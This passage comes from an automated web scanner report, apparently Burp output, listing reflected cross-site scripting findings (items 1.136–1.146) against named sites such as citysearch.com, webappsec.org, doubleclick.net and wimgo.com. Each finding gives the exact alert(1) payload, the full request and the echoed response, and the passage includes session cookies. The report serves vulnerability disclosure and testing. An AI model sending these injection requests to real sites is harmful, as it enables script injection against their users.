User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 1436
Date: Wed, 23 Feb 2011 21:40:37 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0384790&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F8BZIUPz4CkDxFkhQ_PgKQAAAAMDMzPw_8RZIUPz4CkDwFkhQ_PgKQB-eQ
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300934f2';alert(1)//25e8b63311e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.136. http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /guide/bloomfield-pittsburgh-pa/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c597d"><script>alert(1)</script>4cc4b11b365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/bloomfield-pittsburgh-pa/x26amp?c597d"><script>alert(1)</script>4cc4b11b365=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:25 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=feb174af85881661ed80d4e9b52fb930eae49637; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Set-Cookie: cs_session=79ca58bbce2565babfd57e2d990c594c8237bdf5; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Set-Cookie: tseg=444; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:26 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp?c597d"><script>alert(1)</script>4cc4b11b365=1" />
...[SNIP]...

1.137. http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /guide/pittsburgh-pa/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a0f"><script>alert(1)</script>9c07a67884d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/pittsburgh-pa/x26amp?21a0f"><script>alert(1)</script>9c07a67884d=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:13 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=d69fa7e554d0a10a718d2fe695adaccc8bba1c28; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Set-Cookie: cs_session=60da67a061bc6b32e8cc34ec0bc8d299827a70c5; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: recent_geos=69794%7E%7CPittsburgh; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Set-Cookie: tseg=848; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:13 GMT; Path=/
Set-Cookie: userSearchLoc=Pittsburgh%2C%20PA%7E%7C69794; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 64496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp?21a0f"><script>alert(1)</script>9c07a67884d=1" />
...[SNIP]...

1.138. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a46c"><img%20src%3da%20onerror%3dalert(1)>da470ffd4e0 was submitted in the REST URL parameter 2. This input was echoed as 6a46c"><img src=a onerror=alert(1)>da470ffd4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /listings/bloomfield6a46c"><img%20src%3da%20onerror%3dalert(1)>da470ffd4e0/musical_instruments/8667_3948 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:38 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=eab5605139476f5ffbfe6499a3d40ec9ea63650a; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Set-Cookie: cs_session=2d7b669341af42bf0f7a290aa6b816f2be48fb13; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Set-Cookie: tseg=71; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:38 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 65014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<input name="where" id="filter:where" type="hidden" value="bloomfield6a46c"><img src=a onerror=alert(1)>da470ffd4e0" />
...[SNIP]...

1.139. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac61d"><img%20src%3da%20onerror%3dalert(1)>cacbbb22cec was submitted in the REST URL parameter 3. This input was echoed as ac61d"><img src=a onerror=alert(1)>cacbbb22cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /listings/bloomfield/musical_instrumentsac61d"><img%20src%3da%20onerror%3dalert(1)>cacbbb22cec/8667_3948 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:51 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:51 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=f5ff0092c0269684beef07934aaa870c1c9371c2; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Set-Cookie: cs_session=b0c0593abce4beb60e5b4d88bead462f5d5a680c; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Set-Cookie: tseg=823; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:51 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 57597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<input name="tagName" id="filter:tagName" type="hidden" value="musical_instrumentsac61d"><img src=a onerror=alert(1)>cacbbb22cec" />
...[SNIP]...

1.140. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf296"><script>alert(1)</script>915b0164ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /listings/bloomfield/musical_instruments/8667_3948/x22?cf296"><script>alert(1)</script>915b0164ca9=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /listings/bloomfield/musical_instruments/8667_3948/x22
Date: Sat, 26 Feb 2011 02:12:58 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:12:58 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: usrid=60b9ad0426bf6582b94ea75a479ea44d9be383ce; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:12:58 GMT; Path=/
Set-Cookie: cs_session=d11a5e0f1728cb13879eba43ec96db5dabdc99f7; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: recent_geos=71473%7E%7CDallas; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:12:58 GMT; Path=/
Set-Cookie: tseg=387; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:12:58 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 17810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22?cf296"><script>alert(1)</script>915b0164ca9=1" />
...[SNIP]...

1.141. http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://projects.webappsec.org
Path:   /w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c86"><img%20src%3da%20onerror%3dalert(1)>64ff6fcbc40 was submitted in the REST URL parameter 4. This input was echoed as 57c86"><img src=a onerror=alert(1)>64ff6fcbc40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86"><img%20src%3da%20onerror%3dalert(1)>64ff6fcbc40 HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:16:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Frame-Options: deny
Expires: Fri, 25 Feb 2011 02:16:21 GMT
Cache-Control: no-cache
Content-Length: 25531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<a href="http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86"><img src=a onerror=alert(1)>64ff6fcbc40?show_all=1">
...[SNIP]...

1.142. http://projects.webappsec.org/w/page-revisions/13246986/a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://projects.webappsec.org
Path:   /w/page-revisions/13246986/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8641"><img%20src%3da%20onerror%3dalert(1)>0f2d26e32b6 was submitted in the REST URL parameter 4. This input was echoed as b8641"><img src=a onerror=alert(1)>0f2d26e32b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /w/page-revisions/13246986/ab8641"><img%20src%3da%20onerror%3dalert(1)>0f2d26e32b6 HTTP/1.1
Host: projects.webappsec.org
Proxy-Connection: keep-alive
Referer: http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E64ff6fcbc40
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pbj=c141224b73feb9193565e6eeb03e001298670485; __qca=P0-1048600453-1298670520461; __utmz=133238479.1298686864.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=133238479.1282775871.1298670519.1298670519.1298686864.2; __utmc=133238479; __utmb=133238479.1.10.1298686864

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:31:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Frame-Options: deny
Expires: Fri, 25 Feb 2011 02:31:30 GMT
Cache-Control: no-cache
Content-Length: 25423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<a href="http://projects.webappsec.org/w/page-revisions/13246986/ab8641"><img src=a onerror=alert(1)>0f2d26e32b6?show_all=1">
...[SNIP]...

1.143. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload f0150<script>alert(1)</script>d9fc77691a6 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1298497010810&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-4809460702016037&slotname=KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250f0150<script>alert(1)</script>d9fc77691a6&page_slots=KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250&cookie_enabled=1&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1659860762&ga_fc=true&url=http%3A%2F%2Fwww.komonews.com%2F&lmt=1298518211&dt=1298497010811&cc=33&biw=1210&bih=642&ifi=1&adk=2142605729&u_tz=-360&u_his=1&u_java=true&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2773

GA_googleSetAdContentsBySlotForSync({"KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250f0150<script>alert(1)</script>d9fc77691a6":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

1.144. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec907"><script>alert(1)</script>dfc89eb5c90 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instrumentsec907"><script>alert(1)</script>dfc89eb5c90/x22 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=el4ekel9u3jv3uo8qkc3utlk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instrumentsec907"><script>alert(1)</script>dfc89eb5c90/x22?navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

1.145. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2093"-alert(1)-"0fd1d4f72b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instrumentse2093"-alert(1)-"0fd1d4f72b0/x22 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=g7r6tdiihg9dd8pt4okfrb2rh7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
" ) );
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instrumentse2093"-alert(1)-"0fd1d4f72b0/x22?radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

1.146. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a6de"-alert(1)-"b1c598501c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

